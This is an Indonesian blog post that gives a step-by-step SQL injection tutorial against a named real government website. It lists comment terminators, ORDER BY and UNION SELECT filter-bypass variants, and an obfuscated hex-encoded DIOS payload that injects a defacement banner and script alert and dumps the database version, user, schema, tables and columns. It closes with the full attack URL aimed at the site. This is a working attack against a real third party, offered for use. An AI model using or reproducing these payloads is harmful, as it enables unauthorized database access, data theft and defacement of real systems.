Featured Post
*SQL INJECTION (CHALLENGE) IN PARAMETER HTML*
*ASSALAMUALAIKUM BALIK LAGI DENGAN GUA KICK_OUT,KALI INI SAYA AKAN MEMBAGIKAN TUTORIAL CHALLNGE BERBASIS PARAMETER IN HTML*
*UNTUK CHALLNYA :*
*https://lampung.kemenag.go.id/*
*UNTUK MENCARI PARAMETER ID NYA KALIAN KE ANON HACKBAR,KALAU TIDAK ADA ANON HACKBAR KALIAN BISA DOWNLOAD DI GOOGLE DAH ADA BANYAK VERSI :)*
*TEMPEL TARGET WEBSITE KE ANON HACKBAR*
*GESER KETIGA DARI ATAS AMPE MENTOK KE UJUNG,DAN PENCET EXTRACT LINKS**PILIH PAGE LINKS*
*PILIH SALAH SATU WEBSITE BERIKUT*
*JIKA SUDAH TEMPELKAN DI GOOGLE ATAU MAU LANGSUNG INJECT DI ANON JUGA BISA ITU SELERA MASING-MASING :)*
*CARA MENGECEK VULN ATAU TIDAK KITA TAMBAHIN TANDA KUTIP ATAS UNTUK MENGECEK WEBSITE ITU RENTAN DALAM SQL INJECTION ATAU TIDAK :)*
*JIKA VULN AKAN ADA PERUBAHAN PADA WEBSITE TERSEBUT ENTAH ITU DARI GAMBAR ATAU FONT PADA WEBSITE TERSEBUT**TAMBAHKAN BELANCE DI BELAKANG PARAMETER/BELAKANG KUTIP TERSEBUT :)*
*DAN WEBSITENYA KEMBALI NORMAL*
*BELANCE ADA BEBERAPA MACAM CONTOHNYA :*
*1. --+-*
*2. -- -*
*3. --+*
*4. +--+*
*5. %23*
*6. ;%00*
*( DAN MASIH BANYAK LAGI )*
*JIKA KALAU UDAH KALIAN TINGGAL ORDER BY SAMPAI ERROR KEMBALI CONTOHNYA :*
*ORDER BY 1--+-*
*ORDER BY 2--+-*
*ORDER BY 3--+-*
*DAN ADA JUGA ORDER BY BYPASS CONTOHNYA :*
*ORDER+BY+1+ASC--+-*
*DISINI WEBSITENYA ERROR DIANGKAH 17 BERARTI ANGKANYA CUMAN ADA 16 DOANG :)*
*CARA MWNCARI ANGKAH TOGELNYA DENGAN CARA :*
*UNION SELECT 1--+-*
*UNION SELECT 2--+-*
*SAMPAI ANGKAH YANG KALIAN DAPAT DARI HASIL ORDER BY TADI*
*DAN ADA JUGA UNION SELECT BYPASS CONTOH :*
1.+AND+0+/*!50000%55niON*/+/*!50000%53eLeCt*/+1,2,3 ( SAMPAI ERROR ) --+-
2.+AND+MOD(9,9)+/*!50000UNION/**_**/*/+/*!50000SELECT/**_**/*/+
*DAN MASIH BANYAK LAGI :)*
*JIKA WEBSITE NYA BLUM MENGELUARKAN ANGKAH TOGELNYA MAKA GUNAKAN ( - ) ( . ) SEBELUM PARAMETER ID, Dan ada juga Yang memakai ( %25 0 Union Select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+-.html )*
*DAN BOOM ANGKAH TOGELNYA KLUAR :)*
*TINGGAL KITA INJECT DENGAN CARA MEMASUKAN DIOS KEPADA ANGKAH TOGEL TERSEBUT*
*DENGAN CARA Union Select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+-.html*
*DAN BOOM KE SOLPED :)*
DIOS YANG SAYA GUNAKAN :
/*!50000cOncat/**KICK_OUT**/*/(0x3c7363726970743e616c6572742822496e6a6563746564204279204b31434b5f30555422293b3c2f7363726970743e3c63656e7465723e3c62723e494e4a4543544544204259204b31434b5f3055542f62723e3c63656e7465723e3c666f6e7420666163653d226d6f6e6f73706163652220636f6c6f723d2270696e6b222073697a653d2231223e4b31434b5f305554202d20515545454e5f4e494748543c2f666f6e743e3c68313e494e4a4543544544204259204b31434b5f3055543c2f68313e3c2f63656e7465723e3c63656e7465723e3c68313e4b31434b5f3055543c2f68313e3c2f63656e7465723e3c63656e7465723e3c68313e5f5f5f5f5f5f5f5f5f5f3c2f68313e3c2f63656e7465723e3c63656e7465723e3c68313e515545454e5f4e494748543c2f68313e3c2f63656e7465723e,0x3c63656e7465723e3c696d67207372633d2268747470733a2f2f692e6962622e636f2f3353627a357a322f4b49434b4f55542e6a7067222077696474683d2233353022206865696768743d22333530223e3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3c696e733e3c6c6567656e64207374796c653d22636f6c6f723a7265643b223e494e4a4543544544204259204b49434b5f4f55543c2f6c6567656e643e3c2f696e733e3c6d61726b3e3c666f6e7420636f6c6f723d7265643e53554c53454c424c41434b4841543c2f666f6e743c2f6d61726b3e203c2f666f6e743e3c2f63656e7465723e3c2f623e3c62723e,0x3c62723e,0x56455253494f4e3a3a20,/*!50000VerSiOn/**KICK_OUT**/*/(),0x3c62723e,0x555345523a3a20,/*!50000UsEr/**KICK_OUT**/*/(),0x3c62723e,0x44415441424153453a3a20,/*!50000DaTabaSe/**KICK_OUT**/*/(),0x3c62723e,(selEct(@x)/*!50000fRom/**KICK_OUT**/*/(/*!50000sElect/**KICK_OUT**/*/(@x:=0x00),(sElect(0)/*!From/**KICK_OUT**/*/(/*!50000inforMation_schEma.coLuMns/**KICK_OUT**/*/)/*!50000Where/**KICK_OUT**/*/(taBle_schema=/*!50000DatAbase/**KICK_OUT*/*/())and(0x00)in(@x:=/*!50000coNcat/**KICK_OUT**/*/(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22726564223e2d2d3e203c2f666f6e743e,0x3c666f6e7420636f6c6f723d22677265656e223e,/*!50000tAble_naMe/**KICK_OUT**/*/,0x3c666f6e7420636f6c6f723d22726564223e203a3a203c666f6e7420636f6c6f723d22677265656e223e,/*!50000colUmn_naMe/**KICK_OUT**/*/))))x))
*DAN HASILNYA :*
https://lampung.kemenag.go.id/static--43310'%20UNION%20SELECT%201,/*!50000cOncat/**KICK_OUT**/*/(0x3c7363726970743e616c6572742822496e6a6563746564204279204b31434b5f30555422293b3c2f7363726970743e3c63656e7465723e3c62723e494e4a4543544544204259204b31434b5f3055542f62723e3c63656e7465723e3c666f6e7420666163653d226d6f6e6f73706163652220636f6c6f723d2270696e6b222073697a653d2231223e4b31434b5f305554202d20515545454e5f4e494748543c2f666f6e743e3c68313e494e4a4543544544204259204b31434b5f3055543c2f68313e3c2f63656e7465723e3c63656e7465723e3c68313e4b31434b5f3055543c2f68313e3c2f63656e7465723e3c63656e7465723e3c68313e5f5f5f5f5f5f5f5f5f5f3c2f68313e3c2f63656e7465723e3c63656e7465723e3c68313e515545454e5f4e494748543c2f68313e3c2f63656e7465723e,0x3c63656e7465723e3c696d67207372633d2268747470733a2f2f692e6962622e636f2f3353627a357a322f4b49434b4f55542e6a7067222077696474683d2233353022206865696768743d22333530223e3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3c696e733e3c6c6567656e64207374796c653d22636f6c6f723a7265643b223e494e4a4543544544204259204b49434b5f4f55543c2f6c6567656e643e3c2f696e733e3c6d61726b3e3c666f6e7420636f6c6f723d7265643e53554c53454c424c41434b4841543c2f666f6e743c2f6d61726b3e203c2f666f6e743e3c2f63656e7465723e3c2f623e3c62723e,0x3c62723e,0x56455253494f4e3a3a20,/*!50000VerSiOn/**KICK_OUT**/*/(),0x3c62723e,0x555345523a3a20,/*!50000UsEr/**KICK_OUT**/*/(),0x3c62723e,0x44415441424153453a3a20,/*!50000DaTabaSe/**KICK_OUT**/*/(),0x3c62723e,(selEct(@x)/*!50000fRom/**KICK_OUT**/*/(/*!50000sElect/**KICK_OUT**/*/(@x:=0x00),(sElect(0)/*!From/**KICK_OUT**/*/(/*!50000inforMation_schEma.coLuMns/**KICK_OUT**/*/)/*!50000Where/**KICK_OUT**/*/(taBle_schema=/*!50000DatAbase/**KICK_OUT*/*/())and(0x00)in(@x:=/*!50000coNcat/**KICK_OUT**/*/(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22726564223e2d2d3e203c2f666f6e743e,0x3c666f6e7420636f6c6f723d22677265656e223e,/*!50000tAble_naMe/**KICK_OUT**/*/,0x3c666f6e7420636f6c6f723d22726564223e203a3a203c666f6e7420636f6c6f723d22677265656e223e,/*!50000colUmn_naMe/**KICK_OUT**/*/))))x)),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+-.html
Related Posts
Post a Comment
Archive
- December 2021 (3)
- November 2021 (3)
- October 2021 (2)
- September 2021 (8)
- August 2021 (4)
- July 2021 (6)
- April 2021 (12)
- March 2021 (12)
- February 2021 (14)
Popular
-
Ok guys Kembali lagi bersama gua ./numb_404 Guys Ya, oke kali ini gua akan memberikan tutorial SQL…
-
Assalamualaikum wr.wb Kali ini saya akan memberikan sedikit materi tentang membikin/membuat server…
-
Assalamualaikum wr wb Oke guys kembali lagi bersama gw Lkey7,Disini gw mau share tools BCA v2. Ma…